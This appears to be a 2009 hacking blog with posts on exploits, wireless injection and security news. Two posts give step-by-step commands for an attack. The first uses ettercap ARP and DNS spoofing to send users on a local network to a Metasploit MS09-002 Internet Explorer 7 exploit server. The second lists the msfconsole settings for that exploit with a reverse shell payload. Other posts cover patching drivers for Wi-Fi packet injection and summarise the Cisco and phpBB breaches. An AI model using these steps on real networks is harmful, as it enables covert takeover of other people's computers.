break
Feb 27

Lol in my last video i showed how to use MS09-002 exploit ,but in that there was
a problem where the Vulnerable URL should be Opened by the enduser but how to do without sending links to them or mailing or hosting somewhere how ?? so i got an idea like
DNS Posioning Concept,we use DNS posioning so that we can redirect all the end users DNS request to our Vulnerable 80 Port so that when ever they open Ie7 we send their
DNS request to our VUlnerable 80 port and they get powned and we get a shell
with the logged in privileges

Tools used : ettercap and MSFgui
1) change the etter.dns config file of ur ettercap tool to change the A records
remove evry thing under A record and use

* A 192.168.147.128 (ur IP) ur system is acting has a DNS now.

2)go to shell and type

ettercap -T -q -M arp:remote -P dns_spoof //

3)now run MSf3 and choose exploits–>windows–> browser–>ms09_002_memory_corruption

4)select ur target WindowsXpSp2

5)use PAYLOAD windows_shell_reverse_tcp

6)and in SRVPORT change to 80 port and remaining will be same and Apply

7) in Enduser once they open Ie7 they are redirected to your Vulnerable 80 Port
and we get a shell

below is the video as usal

http://blip.tv/file/1822479

WirelessPunter

think beyond the limit

Date February 27th, 2009 Filed in Security 6 Comments »
Feb 22

new Open source Web Application Scanner

Features

* URL finder with adjustable deep
* Passive XSS scan
* Forms processing
* Simple SQL injection scan
* Blind SQL injection scan
* Plugins
* Report generators (Text, HTML,)
* CLI and GUI interfaces
* Cross-platform (Python + GTK)

below is the Full details about this tool

http://code.google.com/p/xcobra/

Date February 22nd, 2009 Filed in Security 3 Comments »
Feb 21

This is my first video of this year and that too Backtrack 4 beta
This time i will be showing POC video on MS Internet Explorer 7 Memory Corruption exploit which
has been released yesterday in milw0rm

Guide
1)Update your Metasploit
svn update ( My MSf is updated)
2 ) open MSf console
3)msf > use exploit/windows/browser/ms09_002_memory_corruption
4)msf exploit(ms09_002) > set PAYLOAD windows/shell_reverse_tcp
5)msf exploit(ms09_002) > set LPORT 1701
6)msf exploit(ms09_002) > set LHOST 192.168.147.128
7)msf exploit(ms09_002) > set URIPATH punter.html
8)msf exploit(ms09_002) > set SRVPORT 80
9)msf exploit(ms09_002) > exploit
10) Session s -i 1
below is the video

http://blip.tv/file/1798741
done
WirelessPunter

Date February 21st, 2009 Filed in Security 11 Comments »
Feb 18

Voip Security Tools, Alas!
what are this tools , and wht this used for ? ( even i asked it for myself )
yes its there for testing security for VOIP, after doing lot of Google search i came across the 1 website about VOIP Security whitepappers and tools below is the link
http://www.voipsa.org/Resources/tools.php
Enjoy

Punter
(I dont have a choice ,if u have more choice in life u never come up)

Date February 18th, 2009 Filed in Security No Comments »
Feb 11

how to patch wireless drivers for RT8187 chipset wifi cards to inject in Backtrack 4 beta this how to was done at late night it was too late if some spelling mistakes can be ;)

today just i was playing with Backtrack 4 beta ,then i tried to check that if my wireless cardwas able to inject for testing WEP ,i tried with the default drivers in Bt4 but it was not working and unable to inject using its default drivers, so then i took few minutes to patch the injection drivers and thaught to make small how to so that it will be easy for others

1)ifconfig wlan0 down  

2)rmmod r8187 rtl8187 2>/dev/null

3)wget http://dl.aircrack-ng.org/drivers/rtl8187_linux_26.1010.zip

4)unzip rtl8187_linux_26.1010.zip

5)cd rtl8187_linux_26.1010.0622.2006/

6)wget http://patches.aircrack-ng.org/rtl8187_2.6.27.patch

7)tar xzf drv.tar.gz

8)tar xzf stack.tar.gz

9)patch -Np1 -i rtl8187_2.6.27.patch

10)make 

here when running make command if u get compiling erros like below  

“asm/semaphore.h: No such file or directory” compile error message  (this is bcz of kernel mismatch for this drivers so for this u should edit the r8187.h

nano rtl8187_linux_26.1010.0622.2006/beta-8187/r8187.h

go to lien 46,47

! see for

#include <asm/io.h>

#include <asm/semaphore.h>

and overwrite lines 46,47 to this….

#if (LINUX_VERSION_CODE < KERNEL_VERSION(2,6,19))

#include <asm/io.h>

#include <asm/semaphore.h>

#else

#include <linux/io.h>

#include <linux/semaphore.h>

#endif

after saving run make command now

11)make install

now reboot the system and type

12)iwconfig then u will see wlan0 has ur interface

13)airmon-ng start wlan0   (for monitor mode)

14)aireplay-ng -9 wlan0   (testing if ur card is injection or no)

the result should look this 

4:15:20  Trying broadcast probe requests…

14:15:20  Injection is working!

14:15:21  Found 1 AP

14:15:21  Trying directed probe requests…

14:15:21  00:1C:13:156:55:99 – channel: 11 – ‘linksys’

14:15:25  Ping (min/avg/max): 3.907ms/108.614ms/160.149ms Power: 8.13

14:15:25  30/30: 100%

done

WipU

Date February 11th, 2009 Filed in Security 5 Comments »
Feb 10

You can get the iso here md5sum and sha512sum

And the VMWare image here md5sum and sha512sum

http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-vm

and do not link them directly.

Release information will shortly be available on the Remote Exploit Web site.

Date February 10th, 2009 Filed in Security No Comments »
Feb 10

Hi guys
BT 4 beta will be released in few hrs from now so before that lets us see the hardisk installation guide from muts.

 
http://www.offensive-security.com/documentation/bt4install.pdf

Date February 10th, 2009 Filed in Security 2 Comments »
Feb 8

Cisco Security Experts are urging admins to update their wireless LAN hardware following the discovery of multiple vulnerabilities in its enterprise Wi-Fi kit.
Security flaws in Cisco Wireless LAN Controllers, Cisco Catalyst 6500 Wireless Services Modules (WiSMs), and Cisco Catalyst 3750 Integrated Wireless LAN Controllers create a mechanism for hackers to knock over vulnerable hardware.
All Cisco Wireless LAN Controllers running version 4.2 of the network giant’s software are affected by a pair of denial of service flaws. A third DoS flaw affects software versions 4.1 and later.

The denial of service bugs include a flaw in the handling of Web authentication, which can cause an affected device to reload, and a separate flaw (that also affects version 4.1 of the software) that means vulnerable kit can freeze up on receipt of malformed data packets. more
Full Advisory of Cisco products, software patchs, the range of effected models here

Date February 8th, 2009 Filed in ITsec News, Security 1 Comment »
Feb 8

In the past few weeks, we’ve noticed a steady increase in posts , Everywhere you look, people are suddenly curious as to how you “boot” someone from online videogames. They’re not entering this rather famous joypad combination to do it – rather, they’re dabbling in somewhat more sinister methods of tampering with the oft-called “closed” environment of XBox Live.

What is XBox Live?
Xbox Live is an online multiplayer gaming and digital media delivery service created and operated by Microsoft Corporation.
Live has long been the subject of social engineers and hackers – fooling people into handing over their logins and making fake Points generators stuffed with Trojans and keyloggers to steal login info.

How is this done?
Well, typically someone will connect their XBox to their PC via a crossover cable (or via their wireless connection), join a multiplayer game then sniff the traffic (you can see a tiny example of that from the first screenshot at the top of the article). They might use this method to grab ip addresses more

Date February 8th, 2009 Filed in ITsec News, Security No Comments »
Feb 8

The online bulletin board phpBB (php Bulletin Board) was taken offline on Sunday, following a security breach that allowed access to user’s names, email, address, and hashed passwords for its entire user base.

In a message posted Sunday, administrators of phpBB.com said the attacker gained access through an unpatched security bug in PHPlist, a third-party email application. The miscreant had access for more than two weeks before the breach was discovered, and phpBB remained down at time of writing, more than three days later. Administrators didn’t respond to emails seeking comment.

A blogger who claimed to have carried out the attack said that details for more than 400,000 accounts were intercepted. The writer claims to have created a script that was able to crack more than 28,000 passwords hashed using an unsalted MD5 algorithm, before posting them to the internet.
more
the attacker had used this published exploit Exploit

Date February 8th, 2009 Filed in Security 12 Comments »

« Previous Entries